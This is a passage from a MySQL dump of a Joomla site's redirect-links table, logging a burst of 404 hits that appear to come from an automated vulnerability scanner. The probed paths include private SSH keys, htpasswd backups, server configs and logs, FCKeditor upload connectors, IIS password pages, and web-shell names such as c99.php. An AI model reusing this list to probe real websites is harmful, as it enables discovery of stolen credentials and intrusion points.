00:00:00',301),(6811,'http://ekvatorprint.com.ua/g',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6812,'http://ekvatorprint.com.ua/funciones.',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6813,'http://ekvatorprint.com.ua/gadmin',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6814,'http://ekvatorprint.com.ua/galeria/',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6815,'http://ekvatorprint.com.ua/galeria',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6816,'http://ekvatorprint.com.ua/galerias',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6817,'http://ekvatorprint.com.ua/gallery',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6818,'http://ekvatorprint.com.ua/gallery_admin',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6819,'http://ekvatorprint.com.ua/gaza.php',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6820,'http://ekvatorprint.com.ua/games',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6821,'http://ekvatorprint.com.ua/gb_admin.php',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6822,'http://ekvatorprint.com.ua/gb_admin.',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6823,'http://ekvatorprint.com.ua/gbpass.pl',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6824,'http://ekvatorprint.com.ua/general',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6825,'http://ekvatorprint.com.ua/get.php',NULL,'','',4,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6826,'http://ekvatorprint.com.ua/getior',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6827,'http://ekvatorprint.com.ua/git-service',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6828,'http://ekvatorprint.com.ua/gfx',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6829,'http://ekvatorprint.com.ua/global',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6830,'http://ekvatorprint.com.ua/gitlog',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6831,'http://ekvatorprint.com.ua/gladius/README.TXT',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6832,'http://ekvatorprint.com.ua/giveadmin',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6833,'http://ekvatorprint.com.ua/global.asa.bak',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6834,'http://ekvatorprint.com.ua/global.asa.old',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6835,'http://ekvatorprint.com.ua/global.asa.orig',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6836,'http://ekvatorprint.com.ua/global.asa.temp',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6837,'http://ekvatorprint.com.ua/global.asa.tmp',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6838,'http://ekvatorprint.com.ua/global.asax.orig',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6839,'http://ekvatorprint.com.ua/global.asax.bak',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6840,'http://ekvatorprint.com.ua/global.asax.old',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6841,'http://ekvatorprint.com.ua/global.asax.tmp',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6842,'http://ekvatorprint.com.ua/globaladmin',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6843,'http://ekvatorprint.com.ua/global.asax.temp',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6844,'http://ekvatorprint.com.ua/globaladminv2',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6845,'http://ekvatorprint.com.ua/globals',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6846,'http://ekvatorprint.com.ua/glossary',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6847,'http://ekvatorprint.com.ua/globals.inc',NULL,'','',1,0,'2017-01-20 13:28:26','0000-00-00 00:00:00',301),(6848,'http://ekvatorprint.com.ua/go',NULL,'','',1,0,'2017-01-20 13:28:27','0000-00-00 00:00:00',301),(6849,'http://ekvatorprint.com.ua/groupadmin',NULL,'','',1,0,'2017-01-20 13:28:27','0000-00-00 00:00:00',301),(6850,'http://ekvatorprint.com.ua/google',NULL,'','',1,0,'2017-01-20 13:28:27','0000-00-00 00:00:00',301),(6851,'http://ekvatorprint.com.ua/graffiti-admin',NULL,'','',1,0,'2017-01-20 13:28:27','0000-00-00 00:00:00',301),(6852,'http://ekvatorprint.com.ua/group',NULL,'','',1,0,'2017-01-20 13:28:27','0000-00-00 00:00:00',301),(6853,'http://ekvatorprint.com.ua/grabbed.html',NULL,'','',1,0,'2017-01-20 13:28:27','0000-00-00 00:00:00',301),(6854,'http://ekvatorprint.com.ua/graphics',NULL,'','',1,0,'2017-01-20 13:28:27','0000-00-00 00:00:00',301),(6855,'http://ekvatorprint.com.ua/groupadmin.php',NULL,'','',1,0,'2017-01-20 13:28:27','0000-00-00 00:00:00',301),(6856,'http://ekvatorprint.com.ua/gs/admin',NULL,'','',1,0,'2017-01-20 13:28:27','0000-00-00 00:00:00',301),(6857,'http://ekvatorprint.com.ua/groupadmin.',NULL,'','',1,0,'2017-01-20 13:28:27','0000-00-00 00:00:00',301),(6858,'http://ekvatorprint.com.ua/gs/plugins/editors/fckeditor',NULL,'','',1,0,'2017-01-20 13:28:27','0000-00-00 00:00:00',301),(6859,'http://ekvatorprint.com.ua/gwadmin',NULL,'','',1,0,'2017-01-20 13:28:27','0000-00-00 00:00:00',301),(6860,'http://ekvatorprint.com.ua/gsadmin',NULL,'','',1,0,'2017-01-20 13:28:27','0000-00-00 00:00:00',301),(6861,'http://ekvatorprint.com.ua/guide',NULL,'','',1,0,'2017-01-20 13:28:27','0000-00-00 00:00:00',301),(6862,'http://ekvatorprint.com.ua/guides',NULL,'','',1,0,'2017-01-20 13:28:27','0000-00-00 00:00:00',301),(6863,'http://ekvatorprint.com.ua/gulpfile.coffee',NULL,'','',1,0,'2017-01-20 13:28:27','0000-00-00 00:00:00',301),(6864,'http://ekvatorprint.com.ua/gulpfile.js',NULL,'','',1,0,'2017-01-20 13:28:27','0000-00-00 00:00:00',301),(6865,'http://ekvatorprint.com.ua/h',NULL,'','',1,0,'2017-01-20 13:28:27','0000-00-00 00:00:00',301),(6866,'http://ekvatorprint.com.ua/hadmin',NULL,'','',1,0,'2017-01-20 13:28:27','0000-00-00 00:00:00',301),(6867,'http://ekvatorprint.com.ua/hTTgS.mdb',NULL,'','',1,0,'2017-01-20 13:28:27','0000-00-00 00:00:00',301),(6868,'http://ekvatorprint.com.ua/hardware',NULL,'','',1,0,'2017-01-20 13:28:27','0000-00-00 00:00:00',301),(6869,'http://ekvatorprint.com.ua/hc_admin',NULL,'','',1,0,'2017-01-20 13:28:27','0000-00-00 00:00:00',301),(6870,'http://ekvatorprint.com.ua/hello',NULL,'','',1,0,'2017-01-20 13:28:27','0000-00-00 00:00:00',301),(6871,'http://ekvatorprint.com.ua/head.',NULL,'','',1,0,'2017-01-20 13:28:27','0000-00-00 00:00:00',301),(6872,'http://ekvatorprint.com.ua/heip65_admin.nsf',NULL,'','',1,0,'2017-01-20 13:28:27','0000-00-00 00:00:00',301),(6873,'http://ekvatorprint.com.ua/headers',NULL,'','',1,0,'2017-01-20 13:28:27','0000-00-00 00:00:00',301),(6874,'http://ekvatorprint.com.ua/header',NULL,'','',1,0,'2017-01-20 13:28:27','0000-00-00 00:00:00',301),(6875,'http://ekvatorprint.com.ua/header_admin.',NULL,'','',1,0,'2017-01-20 13:28:27','0000-00-00 00:00:00',301),(6876,'http://ekvatorprint.com.ua/health',NULL,'','',1,0,'2017-01-20 13:28:27','0000-00-00 00:00:00',301),(6877,'http://ekvatorprint.com.ua/header_admin.php',NULL,'','',1,0,'2017-01-20 13:28:27','0000-00-00 00:00:00',301),(6878,'http://ekvatorprint.com.ua/helloEJB',NULL,'','',1,0,'2017-01-20 13:28:27','0000-00-00 00:00:00',301),(6879,'http://ekvatorprint.com.ua/helloKona',NULL,'','',1,0,'2017-01-20 13:28:27','0000-00-00 00:00:00',301),(6880,'http://ekvatorprint.com.ua/helloWorld',NULL,'','',1,0,'2017-01-20 13:28:27','0000-00-00 00:00:00',301),(6881,'http://ekvatorprint.com.ua/hellouser',NULL,'','',1,0,'2017-01-20 13:28:28','0000-00-00 00:00:00',301),(6882,'http://ekvatorprint.com.ua/hellouser.jsp',NULL,'','',1,0,'2017-01-20 13:28:28','0000-00-00 00:00:00',301),(6883,'http://ekvatorprint.com.ua/helpadmin',NULL,'','',1,0,'2017-01-20 13:28:28','0000-00-00 00:00:00',301),(6884,'http://ekvatorprint.com.ua/help',NULL,'','',1,0,'2017-01-20 13:28:28','0000-00-00 00:00:00',301),(6885,'http://ekvatorprint.com.ua/help.htm',NULL,'','',1,0,'2017-01-20 13:28:28','0000-00-00 00:00:00',301),(6886,'http://ekvatorprint.com.ua/help/',NULL,'','',1,0,'2017-01-20 13:28:28','0000-00-00 00:00:00',301),(6887,'http://ekvatorprint.com.ua/history.txt',NULL,'','',1,0,'2017-01-20 13:28:28','0000-00-00 00:00:00',301),(6888,'http://ekvatorprint.com.ua/hitcount',NULL,'','',1,0,'2017-01-20 13:28:28','0000-00-00 00:00:00',301),(6889,'http://ekvatorprint.com.ua/history.md',NULL,'','',1,0,'2017-01-20 13:28:28','0000-00-00 00:00:00',301),(6890,'http://ekvatorprint.com.ua/history',NULL,'','',1,0,'2017-01-20 13:28:28','0000-00-00 00:00:00',301);
INSERT INTO `j25_redirect_links` VALUES (6891,'http://ekvatorprint.com.ua/home.html',NULL,'','',1,0,'2017-01-20 13:28:28','0000-00-00 00:00:00',301),(6892,'http://ekvatorprint.com.ua/homepage',NULL,'','',1,0,'2017-01-20 13:28:28','0000-00-00 00:00:00',301),(6893,'http://ekvatorprint.com.ua/hostadmin',NULL,'','',1,0,'2017-01-20 13:28:28','0000-00-00 00:00:00',301),(6894,'http://ekvatorprint.com.ua/hosts',NULL,'','',1,0,'2017-01-20 13:28:28','0000-00-00 00:00:00',301),(6895,'http://ekvatorprint.com.ua/hotel_admin',NULL,'','',1,0,'2017-01-20 13:28:28','0000-00-00 00:00:00',301),(6896,'http://ekvatorprint.com.ua/howto',NULL,'','',1,0,'2017-01-20 13:28:28','0000-00-00 00:00:00',301),(6897,'http://ekvatorprint.com.ua/hradmin',NULL,'','',1,0,'2017-01-20 13:28:28','0000-00-00 00:00:00',301),(6898,'http://ekvatorprint.com.ua/htaccess.dist',NULL,'','',1,0,'2017-01-20 13:28:28','0000-00-00 00:00:00',301),(6899,'http://ekvatorprint.com.ua/htaccess.old',NULL,'','',1,0,'2017-01-20 13:28:28','0000-00-00 00:00:00',301),(6900,'http://ekvatorprint.com.ua/htaccess.bak',NULL,'','',1,0,'2017-01-20 13:28:28','0000-00-00 00:00:00',301),(6901,'http://ekvatorprint.com.ua/htaccess.backup',NULL,'','',1,0,'2017-01-20 13:28:28','0000-00-00 00:00:00',301),(6902,'http://ekvatorprint.com.ua/htadmin',NULL,'','',1,0,'2017-01-20 13:28:29','0000-00-00 00:00:00',301),(6903,'http://ekvatorprint.com.ua/htgroup',NULL,'','',1,0,'2017-01-20 13:28:29','0000-00-00 00:00:00',301),(6904,'http://ekvatorprint.com.ua/html/config.rb',NULL,'','',1,0,'2017-01-20 13:28:29','0000-00-00 00:00:00',301),(6905,'http://ekvatorprint.com.ua/html',NULL,'','',1,0,'2017-01-20 13:28:29','0000-00-00 00:00:00',301),(6906,'http://ekvatorprint.com.ua/html/js/misc/swfupload//swfupload.swf',NULL,'','',1,0,'2017-01-20 13:28:29','0000-00-00 00:00:00',301),(6907,'http://ekvatorprint.com.ua/htdocs',NULL,'','',1,0,'2017-01-20 13:28:29','0000-00-00 00:00:00',301),(6908,'http://ekvatorprint.com.ua/html/cgi-bin/',NULL,'','',1,0,'2017-01-20 13:28:29','0000-00-00 00:00:00',301),(6909,'http://ekvatorprint.com.ua/html/js/misc/swfupload/swfupload.swf',NULL,'','',1,0,'2017-01-20 13:28:29','0000-00-00 00:00:00',301),(6910,'http://ekvatorprint.com.ua/html/js/misc/swfupload/swfupload_f9.swf',NULL,'','',1,0,'2017-01-20 13:28:29','0000-00-00 00:00:00',301),(6911,'http://ekvatorprint.com.ua/htpasswd.bak',NULL,'','',2,0,'2017-01-20 13:28:29','0000-00-00 00:00:00',301),(6912,'http://ekvatorprint.com.ua/htmldb',NULL,'','',1,0,'2017-01-20 13:28:29','0000-00-00 00:00:00',301),(6913,'http://ekvatorprint.com.ua/htpasswd/htpasswd.bak',NULL,'','',1,0,'2017-01-20 13:28:29','0000-00-00 00:00:00',301),(6914,'http://ekvatorprint.com.ua/htpasswd',NULL,'','',1,0,'2017-01-20 13:28:29','0000-00-00 00:00:00',301),(6915,'http://ekvatorprint.com.ua/humans.txt',NULL,'','',18,0,'2017-01-20 13:28:29','0000-00-00 00:00:00',301),(6916,'http://ekvatorprint.com.ua/httpd/logs/access_log',NULL,'','',1,0,'2017-01-20 13:28:29','0000-00-00 00:00:00',301),(6917,'http://ekvatorprint.com.ua/httpd.conf',NULL,'','',1,0,'2017-01-20 13:28:29','0000-00-00 00:00:00',301),(6918,'http://ekvatorprint.com.ua/httpd/logs/access.log',NULL,'','',1,0,'2017-01-20 13:28:29','0000-00-00 00:00:00',301),(6919,'http://ekvatorprint.com.ua/httpd/logs/error.log',NULL,'','',1,0,'2017-01-20 13:28:29','0000-00-00 00:00:00',301),(6920,'http://ekvatorprint.com.ua/httpd.core',NULL,'','',1,0,'2017-01-20 13:28:29','0000-00-00 00:00:00',301),(6921,'http://ekvatorprint.com.ua/httpd.ini',NULL,'','',1,0,'2017-01-20 13:28:29','0000-00-00 00:00:00',301),(6922,'http://ekvatorprint.com.ua/i',NULL,'','',1,0,'2017-01-20 13:28:29','0000-00-00 00:00:00',301),(6923,'http://ekvatorprint.com.ua/httpd/logs/error_log',NULL,'','',1,0,'2017-01-20 13:28:29','0000-00-00 00:00:00',301),(6924,'http://ekvatorprint.com.ua/i18nctxSample/docs/',NULL,'','',1,0,'2017-01-20 13:28:29','0000-00-00 00:00:00',301),(6925,'http://ekvatorprint.com.ua/hypermail',NULL,'','',1,0,'2017-01-20 13:28:29','0000-00-00 00:00:00',301),(6926,'http://ekvatorprint.com.ua/ibm/console',NULL,'','',1,0,'2017-01-20 13:28:30','0000-00-00 00:00:00',301),(6927,'http://ekvatorprint.com.ua/i.php',NULL,'','',1,0,'2017-01-20 13:28:30','0000-00-00 00:00:00',301),(6928,'http://ekvatorprint.com.ua/i18nctxSample/',NULL,'','',1,0,'2017-01-20 13:28:30','0000-00-00 00:00:00',301),(6929,'http://ekvatorprint.com.ua/i18nctxSample',NULL,'','',1,0,'2017-01-20 13:28:30','0000-00-00 00:00:00',301),(6930,'http://ekvatorprint.com.ua/i-admin',NULL,'','',1,0,'2017-01-20 13:28:30','0000-00-00 00:00:00',301),(6931,'http://ekvatorprint.com.ua/ibm',NULL,'','',1,0,'2017-01-20 13:28:30','0000-00-00 00:00:00',301),(6932,'http://ekvatorprint.com.ua/ice_admin',NULL,'','',1,0,'2017-01-20 13:28:30','0000-00-00 00:00:00',301),(6933,'http://ekvatorprint.com.ua/iadmin',NULL,'','',1,0,'2017-01-20 13:28:30','0000-00-00 00:00:00',301),(6934,'http://ekvatorprint.com.ua/i_admin',NULL,'','',1,0,'2017-01-20 13:28:30','0000-00-00 00:00:00',301),(6935,'http://ekvatorprint.com.ua/ibm_security_logout',NULL,'','',1,0,'2017-01-20 13:28:30','0000-00-00 00:00:00',301),(6936,'http://ekvatorprint.com.ua/id_dsa.ppk',NULL,'','',1,0,'2017-01-20 13:28:30','0000-00-00 00:00:00',301),(6937,'http://ekvatorprint.com.ua/icon',NULL,'','',1,0,'2017-01-20 13:28:30','0000-00-00 00:00:00',301),(6938,'http://ekvatorprint.com.ua/iiasdmpwd/',NULL,'','',1,0,'2017-01-20 13:28:30','0000-00-00 00:00:00',301),(6939,'http://ekvatorprint.com.ua/id_dsa',NULL,'','',9,0,'2017-01-20 13:28:30','0000-00-00 00:00:00',301),(6940,'http://ekvatorprint.com.ua/ids_log.php',NULL,'','',1,0,'2017-01-20 13:28:30','0000-00-00 00:00:00',301),(6941,'http://ekvatorprint.com.ua/id_rsa',NULL,'','',7,0,'2017-01-20 13:28:30','0000-00-00 00:00:00',301),(6942,'http://ekvatorprint.com.ua/ids_log.',NULL,'','',1,0,'2017-01-20 13:28:30','0000-00-00 00:00:00',301),(6943,'http://ekvatorprint.com.ua/icons',NULL,'','',1,0,'2017-01-20 13:28:30','0000-00-00 00:00:00',301),(6944,'http://ekvatorprint.com.ua/iiop/ClientClose',NULL,'','',1,0,'2017-01-20 13:28:30','0000-00-00 00:00:00',301),(6945,'http://ekvatorprint.com.ua/iiop/ClientLogin',NULL,'','',1,0,'2017-01-20 13:28:30','0000-00-00 00:00:00',301),(6946,'http://ekvatorprint.com.ua/iiop/ClientSend',NULL,'','',1,0,'2017-01-20 13:28:30','0000-00-00 00:00:00',301),(6947,'http://ekvatorprint.com.ua/iiop/ClientRecv',NULL,'','',1,0,'2017-01-20 13:28:30','0000-00-00 00:00:00',301),(6948,'http://ekvatorprint.com.ua/iisadmpwd/aexp.htr',NULL,'','',1,0,'2017-01-20 13:28:30','0000-00-00 00:00:00',301),(6949,'http://ekvatorprint.com.ua/iisadmin/',NULL,'','',1,0,'2017-01-20 13:28:30','0000-00-00 00:00:00',301),(6950,'http://ekvatorprint.com.ua/iisadmpwd/achg.htr',NULL,'','',1,0,'2017-01-20 13:28:30','0000-00-00 00:00:00',301),(6951,'http://ekvatorprint.com.ua/iisadmpwd/aexp4.htr',NULL,'','',1,0,'2017-01-20 13:28:30','0000-00-00 00:00:00',301),(6952,'http://ekvatorprint.com.ua/iisadmin',NULL,'','',1,0,'2017-01-20 13:28:30','0000-00-00 00:00:00',301),(6953,'http://ekvatorprint.com.ua/iisadmpwd/aexp2.htr',NULL,'','',1,0,'2017-01-20 13:28:30','0000-00-00 00:00:00',301),(6954,'http://ekvatorprint.com.ua/iisadmpwd/aexp2b.htr',NULL,'','',1,0,'2017-01-20 13:28:30','0000-00-00 00:00:00',301),(6955,'http://ekvatorprint.com.ua/iisadmpwd/aexp3.htr',NULL,'','',1,0,'2017-01-20 13:28:30','0000-00-00 00:00:00',301),(6956,'http://ekvatorprint.com.ua/iisadmpwd/aexp4b.htr',NULL,'','',1,0,'2017-01-20 13:28:30','0000-00-00 00:00:00',301),(6957,'http://ekvatorprint.com.ua/iisadmpwd/anot.htr',NULL,'','',1,0,'2017-01-20 13:28:30','0000-00-00 00:00:00',301),(6958,'http://ekvatorprint.com.ua/iisadmpwd/anot3.htr',NULL,'','',1,0,'2017-01-20 13:28:31','0000-00-00 00:00:00',301),(6959,'http://ekvatorprint.com.ua/iissamples/',NULL,'','',1,0,'2017-01-20 13:28:31','0000-00-00 00:00:00',301),(6960,'http://ekvatorprint.com.ua/iishelp',NULL,'','',1,0,'2017-01-20 13:28:31','0000-00-00 00:00:00',301),(6961,'http://ekvatorprint.com.ua/iishelp/iis/misc/default.php',NULL,'','',1,0,'2017-01-20 13:28:31','0000-00-00 00:00:00',301),(6962,'http://ekvatorprint.com.ua/iishelp/iis/misc/default.',NULL,'','',1,0,'2017-01-20 13:28:31','0000-00-00 00:00:00',301),(6963,'http://ekvatorprint.com.ua/iishelp/',NULL,'','',1,0,'2017-01-20 13:28:31','0000-00-00 00:00:00',301),(6964,'http://ekvatorprint.com.ua/iissamples/exair/howitworks/Code.php',NULL,'','',1,0,'2017-01-20 13:28:31','0000-00-00 00:00:00',301),(6965,'http://ekvatorprint.com.ua/iissamples/exair/howitworks/Codebrw1.php',NULL,'','',1,0,'2017-01-20 13:28:31','0000-00-00 00:00:00',301),(6966,'http://ekvatorprint.com.ua/iissamples/exair/howitworks/Code.',NULL,'','',1,0,'2017-01-20 13:28:31','0000-00-00 00:00:00',301),(6967,'http://ekvatorprint.com.ua/iissamples/exair/howitworks/Codebrw1.',NULL,'','',1,0,'2017-01-20 13:28:31','0000-00-00 00:00:00',301),(6968,'http://ekvatorprint.com.ua/iissamples/exair/howitworks/Codebrws.php',NULL,'','',1,0,'2017-01-20 13:28:31','0000-00-00 00:00:00',301),(6969,'http://ekvatorprint.com.ua/iissamples/exair/howitworks/Codebrws.',NULL,'','',1,0,'2017-01-20 13:28:31','0000-00-00 00:00:00',301),(6970,'http://ekvatorprint.com.ua/iissamples/sdk/asp/docs/CodeBrws.',NULL,'','',1,0,'2017-01-20 13:28:31','0000-00-00 00:00:00',301),(6971,'http://ekvatorprint.com.ua/iissamples/sdk/asp/docs/CodeBrws.php',NULL,'','',1,0,'2017-01-20 13:28:31','0000-00-00 00:00:00',301),(6972,'http://ekvatorprint.com.ua/iissamples/sdk/asp/docs/codebrw2.php',NULL,'','',1,0,'2017-01-20 13:28:31','0000-00-00 00:00:00',301),(6973,'http://ekvatorprint.com.ua/iissamples/sdk/asp/docs/codebrws.php',NULL,'','',1,0,'2017-01-20 13:28:31','0000-00-00 00:00:00',301),(6974,'http://ekvatorprint.com.ua/iissamples/sdk/asp/docs/codebrw2.',NULL,'','',1,0,'2017-01-20 13:28:31','0000-00-00 00:00:00',301),(6975,'http://ekvatorprint.com.ua/image',NULL,'','',1,0,'2017-01-20 13:28:31','0000-00-00 00:00:00',301),(6976,'http://ekvatorprint.com.ua/iissamples/sdk/asp/docs/codebrws.',NULL,'','',1,0,'2017-01-20 13:28:31','0000-00-00 00:00:00',301),(6977,'http://ekvatorprint.com.ua/images/README',NULL,'','',1,0,'2017-01-20 13:28:31','0000-00-00 00:00:00',301),(6978,'http://ekvatorprint.com.ua/images/Sym.php',NULL,'','',1,0,'2017-01-20 13:28:31','0000-00-00 00:00:00',301),(6979,'http://ekvatorprint.com.ua/images/c99.php',NULL,'','',1,0,'2017-01-20 13:28:31','0000-00-00 00:00:00',301),(6980,'http://ekvatorprint.com.ua/images01',NULL,'','',1,0,'2017-01-20 13:28:31','0000-00-00 00:00:00',301),(6981,'http://ekvatorprint.com.ua/images_admin',NULL,'','',1,0,'2017-01-20 13:28:31','0000-00-00 00:00:00',301),(6982,'http://ekvatorprint.com.ua/images_upload.php',NULL,'','',1,0,'2017-01-20 13:28:31','0000-00-00 00:00:00',301),(6983,'http://ekvatorprint.com.ua/imail',NULL,'','',1,0,'2017-01-20 13:28:31','0000-00-00 00:00:00',301),(6984,'http://ekvatorprint.com.ua/images_upload/',NULL,'','',1,0,'2017-01-20 13:28:31','0000-00-00 00:00:00',301),(6985,'http://ekvatorprint.com.ua/img',NULL,'','',1,0,'2017-01-20 13:28:31','0000-00-00 00:00:00',301),(6986,'http://ekvatorprint.com.ua/images_upload.',NULL,'','',1,0,'2017-01-20 13:28:31','0000-00-00 00:00:00',301),(6987,'http://ekvatorprint.com.ua/import.php',NULL,'','',1,0,'2017-01-20 13:28:31','0000-00-00 00:00:00',301),(6988,'http://ekvatorprint.com.ua/img_admin',NULL,'','',1,0,'2017-01-20 13:28:31','0000-00-00 00:00:00',301),(6989,'http://ekvatorprint.com.ua/import',NULL,'','',1,0,'2017-01-20 13:28:31','0000-00-00 00:00:00',301),(6990,'http://ekvatorprint.com.ua/import/',NULL,'','',1,0,'2017-01-20 13:28:31','0000-00-00 00:00:00',301),(6991,'http://ekvatorprint.com.ua/imprimer.php',NULL,'','',1,0,'2017-01-20 13:28:31','0000-00-00 00:00:00',301),(6992,'http://ekvatorprint.com.ua/imprimer.',NULL,'','',1,0,'2017-01-20 13:28:31','0000-00-00 00:00:00',301),(6993,'http://ekvatorprint.com.ua/inc/config.inc',NULL,'','',1,0,'2017-01-20 13:28:31','0000-00-00 00:00:00',301),(6994,'http://ekvatorprint.com.ua/in',NULL,'','',1,0,'2017-01-20 13:28:32','0000-00-00 00:00:00',301),(6995,'http://ekvatorprint.com.ua/inc',NULL,'','',1,0,'2017-01-20 13:28:32','0000-00-00 00:00:00',301),(6996,'http://ekvatorprint.com.ua/inc-admin',NULL,'','',1,0,'2017-01-20 13:28:32','0000-00-00 00:00:00',301),(6997,'http://ekvatorprint.com.ua/inc/',NULL,'','',1,0,'2017-01-20 13:28:32','0000-00-00 00:00:00',301),(6998,'http://ekvatorprint.com.ua/inadmin',NULL,'','',1,0,'2017-01-20 13:28:32','0000-00-00 00:00:00',301),(6999,'http://ekvatorprint.com.ua/inc/tiny_mce/',NULL,'','',1,0,'2017-01-20 13:28:32','0000-00-00 00:00:00',301),(7000,'http://ekvatorprint.com.ua/inc/tinymce',NULL,'','',1,0,'2017-01-20 13:28:32','0000-00-00 00:00:00',301),(7001,'http://ekvatorprint.com.ua/inc/fckeditor',NULL,'','',1,0,'2017-01-20 13:28:32','0000-00-00 00:00:00',301),(7002,'http://ekvatorprint.com.ua/inc/tiny_mce',NULL,'','',1,0,'2017-01-20 13:28:32','0000-00-00 00:00:00',301),(7003,'http://ekvatorprint.com.ua/inc/fckeditor/',NULL,'','',1,0,'2017-01-20 13:28:32','0000-00-00 00:00:00',301),(7004,'http://ekvatorprint.com.ua/include/config.inc.php',NULL,'','',1,0,'2017-01-20 13:28:32','0000-00-00 00:00:00',301),(7005,'http://ekvatorprint.com.ua/include_admin.php',NULL,'','',1,0,'2017-01-20 13:28:32','0000-00-00 00:00:00',301),(7006,'http://ekvatorprint.com.ua/inc/tinymce/',NULL,'','',1,0,'2017-01-20 13:28:32','0000-00-00 00:00:00',301),(7007,'http://ekvatorprint.com.ua/include',NULL,'','',1,0,'2017-01-20 13:28:32','0000-00-00 00:00:00',301),(7008,'http://ekvatorprint.com.ua/include/',NULL,'','',1,0,'2017-01-20 13:28:32','0000-00-00 00:00:00',301),(7009,'http://ekvatorprint.com.ua/include/config.inc.',NULL,'','',1,0,'2017-01-20 13:28:32','0000-00-00 00:00:00',301),(7010,'http://ekvatorprint.com.ua/include/fckeditor',NULL,'','',1,0,'2017-01-20 13:28:32','0000-00-00 00:00:00',301),(7011,'http://ekvatorprint.com.ua/include_admin.',NULL,'','',1,0,'2017-01-20 13:28:32','0000-00-00 00:00:00',301),(7012,'http://ekvatorprint.com.ua/include/fckeditor/',NULL,'','',1,0,'2017-01-20 13:28:32','0000-00-00 00:00:00',301),(7013,'http://ekvatorprint.com.ua/includes/adovbs.inc',NULL,'','',1,0,'2017-01-20 13:28:32','0000-00-00 00:00:00',301),(7014,'http://ekvatorprint.com.ua/includes/configure.php~',NULL,'','',1,0,'2017-01-20 13:28:32','0000-00-00 00:00:00',301),(7015,'http://ekvatorprint.com.ua/includes/fckeditor/editor/filemanager/connectors/aspx/upload.aspx',NULL,'','',1,0,'2017-01-20 13:28:32','0000-00-00 00:00:00',301),(7016,'http://ekvatorprint.com.ua/includes/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx',NULL,'','',1,0,'2017-01-20 13:28:32','0000-00-00 00:00:00',301),(7017,'http://ekvatorprint.com.ua/includes/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php',NULL,'','',1,0,'2017-01-20 13:28:32','0000-00-00 00:00:00',301),(7018,'http://ekvatorprint.com.ua/includes/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp',NULL,'','',1,0,'2017-01-20 13:28:32','0000-00-00 00:00:00',301),(7019,'http://ekvatorprint.com.ua/includes/fckeditor/editor/filemanager/connectors/aspx/connector.aspx',NULL,'','',1,0,'2017-01-20 13:28:32','0000-00-00 00:00:00',301),(7020,'http://ekvatorprint.com.ua/includes/fckeditor/editor/filemanager/connectors/asp/upload.asp',NULL,'','',1,0,'2017-01-20 13:28:32','0000-00-00 00:00:00',301),(7021,'http://ekvatorprint.com.ua/includes/fckeditor/editor/filemanager/connectors/asp/connector.asp',NULL,'','',1,0,'2017-01-20 13:28:32','0000-00-00 00:00:00',301),(7022,'http://ekvatorprint.com.ua/includes/fckeditor/editor/filemanager/connectors/php/connector.php',NULL,'','',1,0,'2017-01-20 13:28:32','0000-00-00 00:00:00',301),(7023,'http://ekvatorprint.com.ua/includes/fckeditor/editor/filemanager/connectors/php/upload.php',NULL,'','',1,0,'2017-01-20 13:28:32','0000-00-00 00:00:00',301),(7024,'http://ekvatorprint.com.ua/includes/fckeditor/editor/filemanager/upload/asp/upload.asp',NULL,'','',1,0,'2017-01-20 13:28:32','0000-00-00 00:00:00',301),(7025,'http://ekvatorprint.com.ua/includes/fckeditor/editor/filemanager/upload/aspx/upload.aspx',NULL,'','',1,0,'2017-01-20 13:28:32','0000-00-00 00:00:00',301),(7026,'http://ekvatorprint.com.ua/includes/fckeditor/editor/filemanager/upload/php/upload.php',NULL,'','',1,0,'2017-01-20 13:28:32','0000-00-00 00:00:00',301),(7027,'http://ekvatorprint.com.ua/includes/js/tiny_mce/',NULL,'','',1,0,'2017-01-20 13:28:33','0000-00-00 